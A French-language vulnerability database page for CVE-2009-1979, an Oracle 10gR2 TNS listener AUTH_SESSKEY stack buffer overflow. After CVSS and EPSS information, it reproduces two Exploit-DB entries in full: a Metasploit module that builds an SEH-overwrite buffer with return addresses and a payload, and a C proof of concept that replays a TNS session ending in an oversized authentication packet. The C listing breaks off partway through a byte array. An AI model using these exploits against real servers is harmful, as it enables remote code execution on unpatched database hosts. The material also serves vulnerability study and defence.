Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE Other |
No information. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16342
Date de publication : 2010-11-23 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: tns_auth_sesskey.rb 11128 2010-11-24 19:43:49Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  # TNS mixin supplies connect/disconnect/sock/tns_packet; Seh supplies
  # generate_seh_record and payload_space used in exploit().
  include Msf::Exploit::Remote::TNS
  include Msf::Exploit::Remote::Seh

  # Module metadata. Payload space is fixed at 0x17e bytes with no bad
  # characters and an SEH exit function; the only registered option is
  # RPORT, defaulting to the TNS listener port 1521.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow',
      'Description'    => %q{
This module exploits a stack buffer overflow in Oracle. When
sending a specially crafted packet containing a long AUTH_SESSKEY value
to the TNS service, an attacker may be able to execute arbitrary code.
},
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11128 $',
      'References'     =>
        [
          [ 'CVE', '2009-1979'],
          [ 'OSVDB', '59110'],
          [ 'BID', '36747'],
          [ 'URL', 'http://blogs.conus.info/node/28' ],
          [ 'URL', 'http://blogs.conus.info/node/35' ],
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 0x17e,
          'BadChars' => "", # none, thx memcpy!
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Index 0 is resolved at run time by exploit() from the VERSION
          # banner; the two concrete targets are selected by index (1, 2).
          [ 'Automatic', { } ],
          [ 'Oracle 10.2.0.1.0 Enterprise Edition',
            {
              # Untested
              # NOTE(review): the comment names oracle.exe v10.2.0.3 for
              # both targets while the target names are 10.2.0.1.0 and
              # 10.2.0.4.0 -- verify which binary each address came from.
              'Ret' => 0x011b0528 # p/p/r in oracle.exe v10.2.0.3
            }
          ],
          [ 'Oracle 10.2.0.4.0 Enterprise Edition',
            {
              # Tested OK - 2010-Jan-20 - jduck
              'Ret' => 0x01347468 # p/p/r in oracle.exe v10.2.0.3
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 20 2009'))

    register_options(
      [
        Opt::RPORT(1521)
      ], self.class)
  end

  # Vulnerability check based solely on the banner returned by tns_version.
  # Only the two "32-bit Windows" builds named in the regexes are reported
  # Vulnerable; any other banner is reported Safe, so Safe only means "the
  # banner did not match", not that the host is patched.
  #
  # @raise [RuntimeError] when no banner could be read
  # @return [Exploit::CheckCode]
  def check
    version = tns_version
    if (not version)
      raise RuntimeError, "Unable to detect version!"
    end

    print_status("Oracle version reply: " + version)

    return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
    return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
    return Exploit::CheckCode::Safe
  end

  # Exploitation sequence.
  #
  # Target selection: with the 'Automatic' target the VERSION banner is
  # mapped to targets[1] (10.2.0.1.0) or targets[2] (10.2.0.4.0); any
  # other choice is used as-is. The session then follows a fixed packet
  # order -- NSPTCN sent twice, NA, TTIPRO, TTIDTY, an OSESSKEY call --
  # before the kpoauth call that carries the oversized AUTH_SESSKEY value.
  # Every intermediate reply is read with get_once(-1, 1) (the 1 is Rex's
  # read timeout in seconds) and discarded; the hex-dump lines that would
  # show them are commented out.
  #
  # @raise [RuntimeError] when no version/target can be determined, when the
  #   second NSPTCN exchange is reset, or when the server still answers
  #   after the final packet
  def exploit
    mytarget = nil

    if target.name =~ /Automatic/
      print_status("Attempting automatic target detection...")
      version = tns_version
      if (not version)
        raise RuntimeError, "Unable to detect version!"
      end

      # Same two banners as check(); anything else is a hard failure here.
      if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
        mytarget = targets[1]
      elsif (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
        mytarget = targets[2]
      end

      if (not mytarget)
        raise RuntimeError, "Unable to automatically detect the target"
      end

      print_status("Automatically detected target \"#{mytarget.name}\"")
    else
      mytarget = target
      print_status("Attacking using target \"#{mytarget.name}\"")
    end

    # 28-byte random user name, reused for both auth calls below.
    username = rand_text_alphanumeric(0x1c)

    connect

    print_status("Sending NSPTCN packet ...")
    # Connect string; SERVICE_NAME/PROGRAM/HOST/PORT are fixed values, the
    # PORT inside it is not tied to the RPORT option.
    connect_data = "" +
      "(DESCRIPTION=" +
        "(CONNECT_DATA=" +
          "(SERVICE_NAME=orcl)" +
          "(CID=" +
            "(PROGRAM=client.exe)" +
            "(HOST=client_host)" +
          ")" +
        ")" +
        "(ADDRESS=" +
          "(PROTOCOL=TCP)" +
          "(PORT=1521)" +
        ")" +
      ")"
    nsptcn_pkt = tns_packet(connect_data)
    sock.put(nsptcn_pkt)

    # read NSPTRS (expecting 8 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # The same connect packet is sent a second time after the NSPTRS reply.
    print_status("Re-sending NSPTCN packet ...")
    sock.put(nsptcn_pkt)

    # read NSPTAC (expecting 32 bytes)
    # A reset/EOF here is the only read failure this method translates
    # into a user-facing message.
    begin
      res = sock.get_once(-1, 1)
    rescue ::Errno::ECONNRESET, EOFError
      raise RuntimeError, "OOPS, maybe the service hasn't started completely yet, try again..."
    end
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send NA
    # Raw bytes captured from a client session; 0xdeadbeef and 0x0092 are
    # packed in front of them and the whole thing is NSPTDA-framed.
    print_status("Sending NA packet ...")
    na_stuff = [0xdeadbeef].pack('N') +
      "\x00\x92" +
      "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" +
      "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" +
      "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" +
      "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00" +
      "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00" +
      "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00" +
      "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A" +
      "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00" +
      "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
    na_pkt = nsptda_packet(na_stuff)
    sock.put(na_pkt)

    # read response (expecting 127 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send TTIPRO
    # 8-byte protocol version list followed by a NUL-terminated platform
    # string identifying the client as IBMPC/WIN_NT-8.1.0.
    print_status("Sending TTIPRO packet ...")
    ttipro_stuff = "\x01\x06\x05\x04\x03\x02\x01\x00" +
      "IBMPC/WIN_NT-8.1.0" +
      "\x00"
    ttipro_pkt = nsptda_packet(ttipro_stuff)
    sock.put(ttipro_pkt)

    # read response (expecting 179 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send TTIDTY
    # Captured data-type negotiation bytes, sent verbatim.
    print_status("Sending TTIDTY packet ...")
    ttidty_stuff = "\x02\xB2\x00\xB2\x00\xD2" +
      "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01" +
      "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01" +
      "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00" +
      "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
    ttidty_pkt = nsptda_packet(ttidty_stuff)
    sock.put(ttidty_pkt)

    # read response (expecting 22 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send first auth pkt (call OSESSKEY)
    # opcode 0x76, flag 1, no parameters.
    print_status("Calling OSESSKEY ...")
    params = []
    dtyauth_pkt = dtyauth_packet(0x76, username, 1, params)
    sock.put(dtyauth_pkt)

    # read RPA (expecting 225 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # build exploit buffer
    # Layout: encoded payload (Space 0x17e), 0x1c bytes of random filler up
    # to 0x19a, the SEH record for the selected target's Ret, then a 5-byte
    # backwards jmp assembled with Metasm whose distance covers the payload
    # space, the 8-byte SEH record and the jmp itself. Note that << appends
    # in place to the String returned by payload.encoded.
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # ensure bad ptr is derefed
    # The 4 bytes at offset 0x17e (start of the filler, just past the
    # payload space) are overwritten with a random value whose top two
    # bits are set, i.e. >= 0xc0000000.
    value = rand(0x3fffffff) | 0xc0000000
    sploit[0x17e,4] = [value].pack('V')

    # send overflow trigger packet (call kpoauth)
    # opcode 0x73, flag 0x121, one AUTH_SESSKEY parameter. Because the value
    # exceeds 0xff bytes, dtyauth_packet -> chunkify will consume +sploit+
    # in place (slice!); it is not used again afterwards.
    params = []
    params << {
      'Name'  => 'AUTH_SESSKEY',
      'Value' => sploit,
      'Flag'  => 1
    }
    dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
    sock.put(dtyauth_pkt)

    # expecting disconnect...
    # Any data at all within the timeout is treated as failure; only a
    # silent/closed connection is taken as success.
    if (res = sock.get_once(-1, 1))
      print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
      raise RuntimeError, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/"
    end

    handler
    disconnect
  end

  # Ask the listener for its version banner.
  #
  # Opens a fresh connection, sends a connect packet whose CONNECT_DATA is
  # COMMAND=VERSION, discards the first reply, returns whatever the second
  # (timed) read yields, then disconnects. There is no ensure clause, so an
  # exception between connect and disconnect skips the disconnect. Callers
  # (check, exploit) treat a nil return as "no banner".
  #
  # @return [String, nil] raw reply bytes
  def tns_version
    connect
    version = "(CONNECT_DATA=(COMMAND=VERSION))"
    pkt = tns_packet(version)
    sock.put(pkt)
    # first reply is thrown away
    sock.get_once
    res = sock.get_once(-1, 1)
    disconnect
    return res
  end

  # Prepend the 10-byte TNS data (NSPTDA) header to +data+.
  #
  # Fields, in order (names as in the original comments): NSPHDLEN =
  # data.length + 10 as 16-bit big-endian, NSPHDPSM 0, packet type 6,
  # reserved 0, NSPHDHSM 0, NSPDAFLG 0. pack('n') keeps only 16 bits, so a
  # body longer than 0xfff5 bytes would get a wrapped length field.
  #
  # @param data [String] packet body
  # @return [String] header followed by +data+
  def nsptda_packet(data)
    pkt = [data.length + 10].pack('n') # NSPHDLEN
    pkt << [0].pack('n') # NSPHDPSM
    pkt << [6].pack('C') # pkt type
    pkt << [0].pack('C') # reserved
    pkt << [0].pack('n') # NSPHDHSM
    pkt << [0].pack('n') # NSPDAFLG
    pkt << data
    return pkt
  end

  # Build an NSPTDA-framed TTI auth packet.
  #
  # Header: the byte triple [3, opi, 2] (third byte 3 when opi == 0x73),
  # then 32-bit little-endian fields: -2 (encodes as 0xfffffffe), user
  # length, flag, -2, parameter count, -2, -2, then the user name as an
  # 8-bit-length-prefixed string. Each parameter contributes its name
  # (32-bit length, 8-bit length, bytes), its value (32-bit length, then
  # either 8-bit length + bytes, or chunkify()'s framing when the value is
  # longer than 0xff bytes; an empty value contributes only the 32-bit
  # length), and its 32-bit 'Flag'.
  #
  # Note: chunkify() consumes its argument in place, so a 'Value' longer
  # than 0xff bytes is left empty in the caller's Hash after this returns.
  #
  # @param opi [Integer] operation byte (exploit() uses 0x76 for OSESSKEY
  #   and 0x73 for kpoauth)
  # @param user [String] user name
  # @param flag [Integer] 32-bit flag field
  # @param params [Array<Hash>] entries keyed 'Name', 'Value', 'Flag'
  # @return [String] complete packet
  def dtyauth_packet(opi, user, flag, params)
    dunno = 2
    dunno = 3 if opi == 0x73

    pkt = [3, opi, dunno].pack('CCC')
    pkt << [-2].pack('V')
    pkt << [user.length].pack('V')
    pkt << [flag].pack('V')
    pkt << [-2].pack('V')
    pkt << [params.length].pack('V')
    pkt << [-2].pack('V')
    pkt << [-2].pack('V')
    pkt << [user.length].pack('C')
    pkt << user

    params.each { |param|
      name = param['Name']
      pkt << [name.length].pack('V')
      pkt << [name.length].pack('C')
      pkt << name

      val = param['Value']
      # 32-bit length is written from the untouched value before chunkify
      # may consume it.
      pkt << [val.length].pack('V')
      if (val.length > 0)
        if (val.length > 0xff)
          pkt << chunkify(val)
        else
          pkt << [val.length].pack('C')
          pkt << val
        end
      end

      flag = param['Flag']
      pkt << [flag].pack('V')
    }

    return nsptda_packet(pkt)
  end

  # Encode a value in TTI chunked form.
  #
  # For more than 0xff bytes: a 0xfe marker, then each full 0xff-byte piece
  # prefixed with 0xff, the remainder (if any) prefixed with its length, and
  # a 0x00 terminator. Shorter input is simply 8-bit-length-prefixed; that
  # branch is unreachable from dtyauth_packet, which only calls this for
  # values longer than 0xff bytes. Destructive: slice! empties +buf+.
  #
  # @param buf [String] value to encode (consumed)
  # @return [String] encoded bytes
  def chunkify(buf)
    ret = ""
    if buf.length > 0xff
      ret << "\xfe"
      while (buf.length > 0xff)
        ret << "\xff"
        ret << buf.slice!(0, 0xff)
      end
      if buf.length > 0
        ret << [buf.length].pack('C')
        ret << buf
      end
      ret << "\x00"
    else
      ret << [buf.length].pack('C')
      ret << buf
    end
    return ret
  end

end
Exploit Database EDB-ID : 9905
Date de publication : 2009-10-29 23h00 +00:00
Auteur : Dennis Yurichev
EDB Vérifié : Yes
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>
#include <string>
// Push `size` bytes of `msg` through one send() call on `s`.
// Outcome is only reported on stdout: a SOCKET_ERROR result prints
// WSAGetLastError(), a short write prints the byte count. Nothing is
// returned and no retry is attempted.
void s_send (SOCKET s, char *msg, DWORD size)
{
  int sent;

  printf ("s_send: begin: %d bytes\n", size);
  sent = send (s, msg, size, 0);
  if (sent == SOCKET_ERROR)
    printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
  else if (sent != size)
    printf ("sent only %d bytes\n", sent);
  printf ("s_send: end\n");
}
// Drain whatever the peer has sent, bounded by a 100 ms select() wait.
// Reads at most 20000 bytes into a stack buffer and prints only the byte
// count; the data itself is thrown away. A recv() result of 0 or -1 is
// reported as a lost connection, a select() timeout as "returns zero".
// A select() error (negative return) is treated like readiness.
void s_recv (SOCKET s)
{
  char buf[20000];
  fd_set readable;
  struct timeval timeout = { 0, 100000 }; // 100 ms

  printf ("s_recv: begin\n");
  FD_ZERO(&readable);
  FD_SET(s, &readable);
  if (!select (0, &readable, 0, 0, &timeout))
  {
    printf ("select() returns zero\n");
    return;
  }

  int r = recv (s, buf, sizeof buf, 0);
  if (r == 0 || r == -1)
    printf ("connection lost, r=%d\n", r);
  else
    printf ("got %d bytes\n", r);
}
// Template for the 58-byte TNS connect (NSPTCN) header. Bytes 0-1 hold the
// packet length and bytes 24-25 the connect-string length; both are left
// at zero here. The bytes are identical to the literal that
// s_send_TNS_command() copies, and this array itself is not referenced by
// any function in this listing.
unsigned char NSPTCN[]=
{
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
//^^ ^^ cmd len
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
#define NSPTCN_HEADER_LEN 58

// 10-byte TNS data-packet (NSPTDA, type 0x06) header. s_send_NSPTDA()
// writes the total packet length big-endian into bytes 0-1 before each
// send, so this is mutable shared state rather than a constant.
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len
0x00, 0x00
};
#define NSPTDA_HEADER_LEN 10
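// Wrap `size` bytes of `msg` in the 10-byte NSPTDA (type 0x06) header and
// hand the result to s_send(). The total length is written big-endian into
// bytes 0-1 of the shared NSPTDA template, which is therefore modified on
// every call; only the low 16 bits of the length fit in the header.
// Not called from anywhere in this listing.
// Change vs. original: a failed malloc() is reported and the send skipped
// instead of writing through a null pointer.
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
  int sz=size + NSPTDA_HEADER_LEN;
  char * buf=(char*)malloc (sz);
  if (buf==NULL)
  {
    printf ("s_send_NSPTDA: malloc(%d) failed\n", sz);
    return;
  }
  NSPTDA[0]=(sz >> 8) & 0xFF;
  NSPTDA[1]=sz & 0xFF;
  memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
  memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
  printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
  s_send (s, buf, sz);
  free (buf);
}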
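// Send a TNS connect (NSPTCN) packet carrying the connect string `cmd`.
// The 58-byte header template below has the same bytes as the NSPTCN
// array; after the copy the packet length (bytes 0-1) and the command
// length (bytes 24-25) are patched in big-endian. Commands of 231 bytes or
// more are rejected with assert(0) as in the original -- the comment there
// says the template would need further changes to carry them.
// Changes vs. original: strlen() is taken once, and a failed malloc() is
// reported and the send skipped instead of writing through a null pointer.
void s_send_TNS_command (SOCKET s, const char *cmd)
{
  const int cmd_len=strlen (cmd);
  printf ("sending [%s]\n", cmd);
  printf ("len: %d\n", cmd_len);

  if (cmd_len>=231)
  {
    // something should be modified here in NSPTCN
    assert (0);
    return;
  }

  const int pkt_len=cmd_len+58;
  unsigned char * pkt=(unsigned char*)malloc (pkt_len);
  if (pkt==NULL)
  {
    printf ("s_send_TNS_command: malloc(%d) failed\n", pkt_len);
    return;
  }

  memcpy (pkt,
    "\x00\x00\x00\x00\x01\x00\x00\x00"
    // plenH, plenL
    "\x01\x3A\x01\x2C\x00\x41\x20\x00"
    "\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
    "\x00\x00\x00\x3A\x00\x00\x02\x00"
    // cmdlenH cmdlenL
    "\x61\x61\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00", 58);
  memcpy (pkt+58, cmd, cmd_len);

  // big-endian packet length at 0-1, command length at 24-25
  pkt[0]=(pkt_len>>8)&0xFF;
  pkt[1]=pkt_len&0xFF;
  pkt[24]=(cmd_len>>8)&0xFF;
  pkt[25]=cmd_len&0xFF;

  s_send (s, (char*)pkt, pkt_len);
  free (pkt);
}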
// Connect to host `h` on TCP/1521 and replay a captured TNS session (two
// NSPTCN connects, NA, TTIPRO, TTIDTY, an OSESSKEY call) that ends in the
// 1318-byte OAUTH packet. Returns true as soon as that last packet has been
// sent -- no reply is read, so the result says nothing about the target's
// state -- and false if the 3-second connect timeout expires.
// NOTE(review): error handling is assert()-based, and two of the asserts
// wrap calls with side effects (ioctlsocket, closesocket): with NDEBUG
// defined those calls disappear, leaving the socket blocking / unclosed.
bool try_host (char * h)
{
  struct hostent *hp;
  WSADATA wsaData;
  struct sockaddr_in sin;
  int r;
  struct timeval t;
  fd_set fd;
  SOCKET s;
  char pkt1318[1318];   // staging buffer for the final packet

  WSAStartup(MAKEWORD(1, 1), &wsaData);   // return value is not checked
  hp=gethostbyname (h);
  assert (hp!=NULL);
  s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
  assert (s!=INVALID_SOCKET);
  {
    // non-blocking so the connect below can be bounded by select()
    u_long on=1;
    assert (ioctlsocket(s, FIONBIO, &on) != -1);
  };
  sin.sin_family=AF_INET;
  sin.sin_port=htons(1521);   // listener port is fixed, not an argument
  memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
  // r is stored but never examined; on a non-blocking socket connect() is
  // presumably returning SOCKET_ERROR/WSAEWOULDBLOCK while it proceeds.
  r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
  t.tv_sec=3;
  t.tv_usec=0;
  FD_ZERO(&fd);
  FD_SET(s, &fd);
  // Wait up to 3 s for writability, i.e. connect completion. A select()
  // error (negative return) also takes the "connected" branch.
  if (select (0, 0, &fd, 0, &t))
  {
    printf ("connected to %s\n", h);
    // Connect string from the author's capture: the CID HOST/USER and the
    // ADDRESS HOST are hard-coded and not derived from `h`.
    s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
    // waiting for NSPTRS
    s_recv(s);
    // same connect packet a second time, as the Metasploit module does
    s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
    // waiting for NSPTAC
    s_recv(s);
    // send NA packet: 10-byte NSPTDA header (length 0x9C, type 6), then
    // the same bytes the Metasploit module above assembles as na_stuff
    s_send (s,
      "\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
      "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
      "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
      "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
      "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
      "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
      "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
      "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
      "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
      "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
      ,156);
    s_recv (s);
    // send TTIPRO (protocol version bytes + "IBMPC/WIN_NT-8.1.0\0")
    s_send (s,
      "\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
      "\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
      "\x2E\x31\x2E\x30\x00"
      , 37);
    s_recv (s);
    // send TTIDTY (captured data-type negotiation bytes)
    s_send (s,
      "\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
      "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
      "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
      "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
      "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
      , 75);
    s_recv (s);
    // call OSESSKEY: opcode 0x76 for user "scott" with captured
    // AUTH_TERMINAL/AUTH_PROGRAM_NM/AUTH_MACHINE/AUTH_PID/AUTH_SID params.
    // Unlike the earlier steps, its reply is not drained before the next
    // packet is sent.
    s_send (s,
      "\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
      "\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
      "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
      "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
      "\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
      "\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
      "\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
      "\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
      "\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
      "\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
      "\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
      "\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
      "\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
      "\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
      , 218);
    // call OAUTH: opcode 0x73, the whole authentication packet captured
    // verbatim (AUTH_SESSKEY, AUTH_PASSWORD, session parameters and the
    // ALTER SESSION NLS settings), copied into the staging buffer.
    memcpy (pkt1318,
      "\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
      "\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
      "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
      "\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
      "\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
      "\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
      "\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
      "\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
      "\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
      "\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
      "\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
      "\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
      "\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
      "\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
      "\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
      "\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
      "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
      "\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
      "\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
      "\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
      "\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
      "\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
      "\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
